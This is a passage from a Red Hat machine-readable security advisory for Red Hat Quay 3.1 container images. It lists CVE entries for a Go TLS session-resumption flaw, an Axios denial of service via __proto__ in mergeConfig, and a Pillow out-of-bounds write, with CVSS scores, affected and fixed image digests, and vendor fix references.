"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
